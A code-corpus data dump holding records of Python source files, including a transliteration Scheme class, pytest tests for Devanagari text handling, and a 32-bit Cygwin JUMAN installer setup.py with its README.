[ { "alpha_fraction": 0.6813380122184753, "alphanum_fraction": 0.6813380122184753, "avg_line_length": 53.967742919921875, "blob_id": "dad820c9feb9f425c53af7966b4209ef24aa5e1d", "content_id": "d6b41c6729232edd083ba46ef4182ca810fbc527", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1704, "license_type": "permissive", "max_line_length": 205, "num_lines": 31, "path": "/indic_transliteration/sanscript/schemes/__init__.py", "repo_name": "Ankit404butfound/indic_transliteration", "src_encoding": "UTF-8", "text": "\nclass Scheme(dict):\n \"\"\"Represents all of the data associated with a given scheme. In addition\n to storing whether or not a scheme is roman, :class:`Scheme` partitions\n a scheme's characters into important functional groups.\n \n :class:`Scheme` is just a subclass of :class:`dict`.\n \n :param data: a :class:`dict` of initial values. Note that the particular characters present here are also assumed to be the _preferred_ transliterations when transliterating to this scheme. \n :param synonym_map: A map from keys appearing in `data` to lists of symbols with equal meaning. For example: M -> ['.n', .'m'] in ITRANS. This synonym_map is not used in transliterating to this scheme.\n :param is_roman: `True` if the scheme is a romanization and `False`\n otherwise.\n \"\"\"\n\n def __init__(self, data=None, synonym_map=None, is_roman=True, name=None):\n super(Scheme, self).__init__(data or {})\n if synonym_map is None:\n synonym_map = {}\n self.synonym_map = synonym_map\n self.is_roman = is_roman\n self.name = name\n\n def fix_lazy_anusvaara(self, data_in):\n from indic_transliteration import sanscript\n data_out = sanscript.transliterate(data=data_in, _from=self.name, _to=sanscript.DEVANAGARI)\n data_out = sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(data_in=data_out)\n return sanscript.transliterate(data=data_out, _from=sanscript.ITRANS, _to=self.name)\n \n def from_devanagari(self, data):\n \"\"\"A convenience method\"\"\"\n from indic_transliteration import sanscript\n return sanscript.transliterate(data=data, _from=sanscript.DEVANAGARI, _to=self.name)" }, { "alpha_fraction": 0.6873536109924316, "alphanum_fraction": 0.7014051675796509, "avg_line_length": 44, "blob_id": "805f9877672682eabfe19cd11a9713fa10223e84", "content_id": "fd35b1abcc2578949cdf2c35f5b285e95f5aab66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1038, "license_type": "permissive", "max_line_length": 113, "num_lines": 19, "path": "/tests/sanscript/brahmic_test.py", "repo_name": "Ankit404butfound/indic_transliteration", "src_encoding": "UTF-8", "text": "from indic_transliteration import sanscript\n\n\n\ndef test_fix_lazy_anusvaara_devanagari():\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(\"तं जित्वा\") == \"तञ् जित्वा\"\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(\"जगइ\") == \"जगइ\"\n\ndef test_fix_lazy_visarga():\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_visarga(\"अन्तः पश्य\") == \"अन्तᳶ पश्य\"\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_visarga(\"अन्तः कुरु\") == \"अन्तᳵ कुरु\"\n\ndef test_do_vyanjana_svara_join():\n devanagari = sanscript.SCHEMES[sanscript.DEVANAGARI]\n assert devanagari.do_vyanjana_svara_join(\"ह्र्\", \"ईः\") == \"ह्रीः\"\n\ndef test_apply_roman_numerals():\n devanagari_str = \"हरि बोल १ ३ ५४ ६ ९को\"\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].apply_roman_numerals(devanagari_str) == \"हरि बोल 1 3 54 6 9को\"" } ]
2
KoichiYasuoka/juman-cygwin32
https://github.com/KoichiYasuoka/juman-cygwin32
910463ec965696419e6ea2d1e25bd8b501ce7d03
0befb16e6e0d420ff786684bdc08218eb86c86d1
e7d6e4c0878a51d109d09c78715f76922720c968
refs/heads/master
2022-04-22T10:46:20.696674
2020-04-19T05:07:43
2020-04-19T05:07:43
256,917,921
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6392961740493774, "alphanum_fraction": 0.6803519129753113, "avg_line_length": 21.66666603088379, "blob_id": "528c275e9728cea6574b0fbaa70ba338f652b91d", "content_id": "c25f6a4b4fabfe78dde4a464fe2019c74767426d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 341, "license_type": "permissive", "max_line_length": 110, "num_lines": 15, "path": "/README.md", "repo_name": "KoichiYasuoka/juman-cygwin32", "src_encoding": "UTF-8", "text": "# juman-cygwin32\n\n[JUMAN](http://nlp.ist.i.kyoto-u.ac.jp/?JUMAN) 7.01 for [Cygwin](https://www.cygwin.com/) (32-bit UTF-8 only).\n\n## Usage\n\nSee [JUMAN page](http://nlp.ist.i.kyoto-u.ac.jp/?JUMAN).\n\n## Installation\n\nOnly for Cygwin with `python37-pip` and `git`:\n\n```sh\npip3.7 install git+https://github.com/KoichiYasuoka/juman-cygwin32\n```\n\n" }, { "alpha_fraction": 0.6414391994476318, "alphanum_fraction": 0.6575682163238525, "avg_line_length": 32.58333206176758, "blob_id": "6d6652534607db0fec7c102861591635cee78029", "content_id": "84c378a8a7bbabf85ca38be0ab8a86d62c9aa303", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 806, "license_type": "permissive", "max_line_length": 79, "num_lines": 24, "path": "/setup.py", "repo_name": "KoichiYasuoka/juman-cygwin32", "src_encoding": "UTF-8", "text": "import setuptools\nimport glob\nimport platform\nif platform.system().startswith(\"CYGWIN\") and platform.machine()!=\"x86_64\":\n pass\nelse:\n raise OSError(\"juman-cygwin32 only for 32-bit Cygwin\")\n\nsetuptools.setup(\n name=\"juman-cygwin32\",\n version=\"0.6.0\",\n packages=setuptools.find_packages(),\n data_files=[\n (\"local/bin\",glob.glob(\"bin/*\")),\n (\"local/libexec/juman\",glob.glob(\"libexec/juman/*\")),\n (\"local/lib\",glob.glob(\"lib/*\")),\n (\"local/etc\",glob.glob(\"etc/*\")),\n (\"local/include\",glob.glob(\"include/*\")),\n (\"local/share/juman/dic\",glob.glob(\"share/juman/dic/*\")),\n (\"local/share/juman/autodic\",glob.glob(\"share/juman/autodic/*\")),\n (\"local/share/juman/wikipediadic\",glob.glob(\"share/juman/wikipediadic/*\")),\n (\"local/share/juman/doc\",glob.glob(\"share/juman/doc/*\"))\n ]\n)\n" } ]
2
zhouyang123200/SreAuto
https://github.com/zhouyang123200/SreAuto
cd1c2bc915f8384ab9bf094094f9c6aab8f3510c
fde7cb691b30dfe4008515e05ecf6005442ab179
d31203f0f0af224608b3ed4b8187561aebc5bd9b
refs/heads/master
2017-12-04T08:12:52.155755
2017-02-26T01:55:54
2017-02-26T01:55:54
83,176,194
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7605633735656738, "alphanum_fraction": 0.7605633735656738, "avg_line_length": 17, "blob_id": "eccbbc7045602bbd3f101abbb0d4565446acb654", "content_id": "c38c07743cb2b6150cb4c2cfa529c7a8ffaf6b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/demo_psutil.py", "repo_name": "zhouyang123200/SreAuto", "src_encoding": "UTF-8", "text": "import psutil\n\nmem = psutil.virtual_memory()\nprint(mem.total, mem.used)" } ]
1
harsha63/FODSassignment
https://github.com/harsha63/FODSassignment
e59769e8bfbe4dd856eb03197ea2298e996c5910
f1e3fefe81b1061093161081d5e5109c53d39676
b55ab4c4a50748b56b1756dd7b21c430349dc4d0
refs/heads/main
2023-01-02T09:49:53.683923
2020-10-23T06:50:52
2020-10-23T06:50:52
306,551,279
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7131147384643555, "alphanum_fraction": 0.7377049326896667, "avg_line_length": 11.199999809265137, "blob_id": "f39fc9d01a058dcf1cb3504071b2c8e5bc683007", "content_id": "9626f7e08ed4d19dfe3e468ad28749f9a90d3d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 122, "license_type": "no_license", "max_line_length": 40, "num_lines": 10, "path": "/README.md", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "# FODSassignment\n\n\nBITS Course: Foundations of Data Science\nDone in python.\n\nCollaborators:\n1. Shivangi Sharma\n2. Ishita Kukreti\n3. Harsha\n" }, { "alpha_fraction": 0.4068857729434967, "alphanum_fraction": 0.47183099389076233, "avg_line_length": 14.52439022064209, "blob_id": "5cf58761197752b4a038e616278e620c6183f2b0", "content_id": "ad6ec34431d6930be99ceee501cf0f280b9e16e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1281, "license_type": "no_license", "max_line_length": 72, "num_lines": 82, "path": "/3A.py", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.special import gamma as G\n\n\n# In[17]:\n\n\nk = 1\na = 4\nb = 6\nu = 0\nN = 160\n\n\n# In[18]:\n\n\nM = np.random.randint(1, 161)\nwhile M >= 0.4 * 160 and M <= 0.6 * 160:\n M = np.random.randint(1, 161)\nL = N - M\narr = np.array([0] * (N - M) + [1] * M)\nnp.random.shuffle(arr)\n\n\n# In[19]:\n\n\nimages = []\nP = []\nQ = []\nm = 0\nl = 0\nMaxP = 0\n\n\n# In[20]:\n\n\nU_ML = M / 160.00\nprint ('%0.2f' % U_ML)\n\n\n# In[ ]:\n\n\nfor j in range(len(arr)):\n P = []\n Q = []\n u = 0\n\n for i in range(101):\n if u > 1:\n u = 1\n Norm = G(a+b+l+m)/(G(a+m)*G(b+l))\n u1 = pow(u, a-1 + m)\n u2 = pow(1 - u, b- 1 + l)\n P_Val = Norm * u1 * u2 #beta function\n if MaxP < P_Val:\n MaxP = P_Val\n P.append(P_Val)\n Q.append(u)\n u += 0.010000\n if arr[j] == 1:\n m += 1\n else:\n l += 1\nfig = plt.figure()\nplt.plot(U, P, 'g')\nplt.ion()\nplt.axis([0, 1, 0, 25])\nplt.xlabel('μ ' + '(No. of points sampled = ' + str(j + 1) + ')')\nplt.ylabel('Prior probability distribution (β)')\nplt.text(0.4, 27, 'μ ML = ' + str(U_ML))\nfig.savefig('/Users/harsha/Desktop/Imagedata3/plot' + str(j+1) + '.png')\n \n\n" }, { "alpha_fraction": 0.5003287196159363, "alphanum_fraction": 0.5693622827529907, "avg_line_length": 14.670103073120117, "blob_id": "792e8e8db968913a4c246b22075e40341e281332", "content_id": "ab2cf6e4e38a3e3cc2b9c4b40b7c3b7bba8b139a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1522, "license_type": "no_license", "max_line_length": 114, "num_lines": 97, "path": "/3B.py", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom pylab import figure, text, scatter, show\nfrom scipy.special import gamma as G\n\n\n# In[13]:\n\n\nimport scipy as sp\nimport random \nimport scipy.integrate\n\n\n# In[8]:\n\n\na=4; b=6; mu=np.linspace(0,1,100);\nbeta=(scipy.special.gamma (a+b)/(scipy.special.gamma (a)*scipy.special.gamma (b)))*((mu)**(a-1))*(((1-mu)**(b-1)))\n\n\n# In[18]:\n\n\nplt.plot(mu,beta)\ntext(0.1, 0.9,'prior', ha='center', va='center')\n\n\n# In[30]:\n\n\n## M = Number of Heads in Randomly Generated Sample. \nu = 0\nN = 160\nM = np.random.randint(1,161)\nwhile(M >= 0.4*160 and M <= 0.6*160):\n M = np.random.randint(1,161)\nL = N - M\narr = np.array([0]*(N-M) + [1]*(M))\t\nnp.random.shuffle(arr)\nU_ML = M/160.00\n\nP = []\nU = []\nfor i in range (101):\n if u > 1:\n u = 1\n Norm = G(a + b + N)/(G(a + M)*G(b + L))\n u1 = pow(u, (a - 1 + M))\n u2 = pow(1 - u, (b - 1 + L))\n P_Val = Norm * u1 * u2\n P.append(P_Val)\n U.append(u)\n u += 0.010000\n #print(Norm)\nprint('%0.2f' %U_ML)\n\nfig = plt.figure()\nplt.plot(U, P)\ntext(0.1, 0.9,'posterior', ha='center', va='center')\nplt.ion()\nplt.xlabel('μ')\nplt.ylabel('P')\nplt.show()\nplt.pause(0.1)\nplt.close()\nfig.savefig('Final Graph.png')\n\n\n# In[36]:\n\n\nzero=random.randint(0,40)\none=160-zero\nn=[0]*zero+[1]*one\nrandom.shuffle(n)\nN=n\n\n\n# In[37]:\n\n\nu=np.linspace(0,1,100)\nb=lambda u: (u**N[i])*((1-u)**(1-N[i]))\n\n\n# In[39]:\n\n\nplt.plot(u,b(u))\ntext(0.1, 0.9,'likelihood', ha='center', va='center')\n\n" } ]
3
jaskirat111/deep_learning_ann
https://github.com/jaskirat111/deep_learning_ann
8b51d39d621f66887d5ad76a052634f094951f20
3f99b0c37e2818567490e014d54385a0af385a25
ced94242a7c85dbf6daf97c14e4fb0be824183dd
refs/heads/master
2020-05-31T10:46:05.124507
2019-06-04T11:48:44
2019-06-04T11:48:44
190,247,254
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7221652269363403, "alphanum_fraction": 0.7437147498130798, "avg_line_length": 28.755725860595703, "blob_id": "989b48285e5119d6b071f61c0d94e48e53082766", "content_id": "9bae4c985e449e0635312b9232e447e33d73c1e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3898, "license_type": "no_license", "max_line_length": 103, "num_lines": 131, "path": "/py_files/deep_learning_ann.py", "repo_name": "jaskirat111/deep_learning_ann", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 4 10:30:44 2018\n\n@author: DELL\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#ading of data\ndataset=pd.read_csv('C:\\\\Users\\\\\\DELL\\\\Desktop\\\\ml\\\\deep_learning_ann\\\\csv_files\\\\Churn_Modelling.csv')\nX=dataset.iloc[: ,3:13].values\nY=dataset.iloc[:, 13].values \n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder_x_1= LabelEncoder() \nX[:, 1]=labelencoder_x_1.fit_transform(X[: ,1])\nlabelencoder_x_2=LabelEncoder()\nX[:, 2]=labelencoder_x_2.fit_transform(X[: ,2])\nonehotencoder=OneHotEncoder(categorical_features=[1])\nX=onehotencoder.fit_transform(X).toarray() \nX=X[:, 1:]\n\n#s[litting dataset into the training set and test t\n\nfrom sklearn.cross_validation import train_test_split \nX_train,X_test,y_train,y_test=train_test_split(X,Y,test_size=0.25,random_state=0)\n#feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc=StandardScaler()\nX_train=sc.fit_transform(X_train)\nX_test=sc.transform(X_test)\n#import the keras Libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#initialising the ann\nClassifier=Sequential()\n#adding the input layer and the first hidden layer\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu',input_dim=11))\n#adding the secong hidden layer\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu')\n\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu')\n\n#adding the output layer\nClassifier.add(Dense(output_dim=1,init='uniform',activation='sigmoid'))\n#compiling the ann\nClassifier.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n#making the predictions\nClassifier.fit(X_train,y_train,batch_size=10,nb_epoch=100)\n\n#making the predictions\ny_pred=Classifier.predict(X_test)\n\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#reading of data\n#tensorflow+theano = Keras\n\n\ndataset=pd.read_csv('C:\\\\Users\\\\\\DELL\\\\Desktop\\\\ml\\\\deep_learning_ann\\\\csv_files\\\\Churn_Modelling.csv')\n\nx = dataset.iloc[:,3 :13].values\ny = dataset.iloc[:,13].values\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\nlabelencoder_1 = LabelEncoder()\n\nx[:, 1] = labelencoder_1.fit_transform(x[:, 1])\n\n\nlabelencoder_2 = LabelEncoder()\n\nx[:, 2] = labelencoder_2.fit_transform(x[:, 2])\n\nonehotencoder = OneHotEncoder(categorical_features = [1])\n\n\nx = onehotencoder.fit_transform(x).toarray()\n\nx = x[:, 1:]\nfrom sklearn.cross_validation import train_test_split\n\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 0.2)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nx_train = sc.fit_transform(x_train)\nx_test = sc.transform(x_test) \n\n#Importing the keras libraries and Package\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#Initialiasing the Ann\nClassifier = Sequential()\n\n#adding the input layer and first hidden layer\nClassifier.add(Dense(output_dim = 6, init ='uniform',activation = 'relu',input_dim = 11))\n#adding the second layer\nClassifier.add(Dense(output_dim = 6, init ='uniform',activation = 'relu'))\n\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\n\n\n\n#Adding teh output layer\nClassifier.add(Dense(output_dim = 1, init ='uniform',activation = 'sigmoid'))\n\nClassifier.compile(optimizer = 'adam',loss = 'binary_crossentropy',metrics = ['accuracy'])\n#Making the predictions \nClassifier.fit(x_train,y_train,batch_size = 1000 ,nb_epoch = 2000)\n\ny_pred = Classifier.predict(x_test)\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test,y_pred.round())\n" } ]
1
Peter-32/summarize1
https://github.com/Peter-32/summarize1
9b00ca5c6f6e0244fe72e8d94ec1008db70c0004
bad287fc97ec34b6bed78b9aed9b0933ae61bba0
3bae8901b1d97418bff9f682e7eac4ed47569f2d
refs/heads/master
2020-09-19T19:47:10.059134
2019-12-04T23:02:00
2019-12-04T23:02:00
224,281,199
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7063732743263245, "alphanum_fraction": 0.7132018208503723, "avg_line_length": 30.759037017822266, "blob_id": "b374a6fcbad578c3394bf3e3cb59f03dd817c8b5", "content_id": "d42bd7555074d86aca6fd3ea0495d3d9de9f7631", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2636, "license_type": "permissive", "max_line_length": 154, "num_lines": 83, "path": "/src/main/1.summarize1.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport nltk\nimport spacy\nfrom os import path\nimport networkx as nx\nimport numpy as np\nimport pyperclip as clip\nfrom numpy.random import seed\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom scipy.spatial.distance import pdist, squareform\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\n# Set seed\nseed(32)\n\n# Initialize Helper Objects\nprint(\"Longer text leads to a longer runtime\")\nprint(\"Progress: 0%\")\nwnl = nltk.WordNetLemmatizer()\ntfidf = TfidfVectorizer()\nnlp = spacy.load('en_core_web_sm')\n\n# Clean Sentences\ndoc = clip.paste()\ndoc = doc.lower()\nsents = nltk.sent_tokenize(doc)\nprocessed_sents = []\nfor sent in sents:\n words = word_tokenize(sent)\n words = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in words]\n words = [wnl.lemmatize(w) for w in words if w.strip() != '']\n processed_sent = \" \".join(words)\n processed_sents.append(processed_sent)\n\n# Create Dictionaries\nprint(\"Progress: 20%\")\ntfidf.fit(processed_sents)\ntfidf_weights_dict, embeddings_dict = dict(zip(tfidf.get_feature_names(), tfidf.idf_)), {}\nvocabulary = tfidf_weights_dict.keys()\nfor word in vocabulary:\n embeddings_dict[word] = nlp(word).vector\n\n# Convert Sentences into Numbers\nprint(\"Progress: 40%\")\nsent_vectors = []\nfor sent in processed_sents:\n vector_sum, denominator = [0]*96, 0\n for word in sent.split(\" \"):\n try:\n vector_sum += embeddings_dict[word]*tfidf_weights_dict[word]\n denominator += tfidf_weights_dict[word]\n except:\n pass\n if denominator != 0:\n sent_vectors.append(vector_sum/denominator)\n else:\n sent_vectors.append(vector_sum)\n\n# Sentence Similarity\nprint(\"Progress: 60%\")\nsent_vectors = np.array(sent_vectors)\nsent_vectors = StandardScaler().fit_transform(sent_vectors)\nsent_vectors = MinMaxScaler().fit_transform(sent_vectors)\ndistances = pdist(sent_vectors, metric='euclidean')\nsentence_similarity_matrix = squareform(distances)\n\n# Graph and PageRank\nprint(\"Progress: 80%\")\ngraph = nx.from_numpy_array(sentence_similarity_matrix)\nscores = nx.pagerank(graph)\nclip.copy(\"\\n\\n\".join([sents[score] for score in [x for (x,y) in sorted([(x,y) for (x,y) in scores.items()], key= lambda x: float(x[1]), reverse=True)]]))\nprint(\"Done - results are in the clipboard\")\n" }, { "alpha_fraction": 0.7294166088104248, "alphanum_fraction": 0.7339677214622498, "avg_line_length": 29.212499618530273, "blob_id": "3907431eeddc25adca2a2197d1a4dc644481ec97", "content_id": "585446049d0ba39d609f5557f88d89f03c2d388b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2417, "license_type": "permissive", "max_line_length": 83, "num_lines": 80, "path": "/src/main/old/2.review_results.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport os\nimport nltk\nimport spacy\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom os import path\nimport networkx as nx\nimport lightgbm as lgb\nfrom pandas import read_csv\nfrom sklearn.svm import SVC\nfrom numpy.random import seed\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom nltk.corpus import stopwords\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.decomposition import TruncatedSVD\n OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, \\\nfrom sklearn.model_selection import cross_val_score, learning_curve\nfrom sklearn.metrics import precision_recall_curve, confusion_matrix, \\\n precision_score, recall_score, accuracy_score\n\n# Functions\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\n# Set seed\nseed(32)\n\n# Extract\nprint(\"Extract\")\nwith open(\"../../data/raw/bitcoin.txt\") as file:\n doc = file.read()\n\n# Transform\nprint(\"Transform\")\nsents = nltk.sent_tokenize(doc)\n\n\nscores = load_obj(\"scores\")\n\nscores = [(x,y) for (x,y) in scores.items()]\nscores = sorted(scores, key= lambda x: float(x[1]), reverse=True)\nscores = [x for (x,y) in scores]\noutput = \"\\n\\n\".join([sents[score] for score in scores])[0:10000]\n\n# Write\nf = open(\"../../data/output/output2.txt\", \"w\")\nf.write(output)\nf.close()\n\n# for i in sorted (scores.values()) :\n# print(i, end = \" \")\n" }, { "alpha_fraction": 0.7006094455718994, "alphanum_fraction": 0.7064499855041504, "avg_line_length": 28.60902214050293, "blob_id": "b065fe3e17b366427c171d7d31ac189108345474", "content_id": "8d04959fc525d496589c4e556161e46ce276ad21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3938, "license_type": "permissive", "max_line_length": 132, "num_lines": 133, "path": "/src/main/old/1.etl.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport os\nimport nltk\nimport spacy\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom os import path\nimport networkx as nx\nimport lightgbm as lgb\nfrom pandas import read_csv\nfrom sklearn.svm import SVC\nfrom numpy.random import seed\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom nltk.corpus import stopwords\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.decomposition import TruncatedSVD\n OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, \\\nfrom sklearn.model_selection import cross_val_score, learning_curve\nfrom sklearn.metrics import precision_recall_curve, confusion_matrix, \\\n precision_score, recall_score, accuracy_score\n\n# Functions\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\n# Set seed\nseed(32)\n\n# Initialize Helper Objects\nprint(\"Initialize Helper Objects\")\nwnl = nltk.WordNetLemmatizer()\ntfidf = TfidfVectorizer()\nnlp = spacy.load('en_core_web_md')\n\n# Extract\nprint(\"Extract\")\nwith open(\"../../data/raw/bitcoin.txt\") as file:\n doc = file.read()\n\n# Transform\nprint(\"Transform\")\ndoc = doc.lower()\ntokens = word_tokenize(guide)\ntext = nltk.Text(tokens)\nwords = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in text]\nwords = [wnl.lemmatize(w) for w in words if w.strip() != ''] # Will take work later to get the original text back without lemmatize.\nsents = nltk.sent_tokenize(guide)\n\n# Get dictionaries\nprint(\"Dictionaries\")\ntfidf.fit(words)\ntfidf_weights_dict = dict(zip(tfidf.get_feature_names(), tfidf.idf_))\nembeddings_dict = {}\nfor val in tfidf_weights_dict:\n embeddings_dict[val] = nlp(val).vector\n\n# Averaged Vectors\nprint(\"Embeddings\")\nsent_vectors = []\nfor sent in sents:\n tokens = word_tokenize(sent)\n text = nltk.Text(tokens)\n words = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in text]\n words = [wnl.lemmatize(w) for w in words if w.strip() != '']\n vector_sum, denominator = [0]*300, 0\n for word in words:\n try:\n vector_sum += embeddings_dict[word]*tfidf_weights_dict[word]\n denominator += tfidf_weights_dict[word]\n except:\n pass\n if denominator != 0:\n sent_vectors.append(vector_sum/denominator)\n else:\n sent_vectors.append(vector_sum)\n\n# Similarity Matrix\nprint(\"Similarity matrix\")\nsim_mat = np.zeros([len(sents), len(sents)])\nfor i in range(len(sents)):\n for j in range(len(sents)):\n if i != j:\n sim_mat[i][j] = cosine_similarity(sent_vectors[i].reshape(1,300), sent_vectors[j].reshape(1,300))[0,0]\nprint(sim_mat)\n\n# Graph\nprint(\"GraphX\")\nnx_graph = nx.from_numpy_array(sim_mat)\nscores = nx.pagerank(nx_graph)\nprint(scores)\n\nsave_obj(scores, \"scores\")\n\n\nprint(len(sent_vectors))\nprint(sent_vectors[-3:])\nprint(scores)\n# words = [wnl.lemmatize(w) for w in words]\n# words = [w for w in words if w not in the_stopwords and w != '']\n\n\n\n\n\nprint(guide[-400:])\n" } ]
3
gitter-badger/auTO-2
https://github.com/gitter-badger/auTO-2
91dd2236c80585b3c43215ea61b1ab13d86af0e5
2c5bda6fb22107c0feab4a74860ae7400a0a7d53
3a8d0698a91069bf51418396a9628e8af803b227
refs/heads/master
2021-01-18T20:14:35.344117
2016-05-16T01:01:05
2016-05-16T01:01:05
59,715,282
0
0
null
2016-05-26T03:02:52
2016-05-17T22:44:03
2016-05-17T06:12:21
null
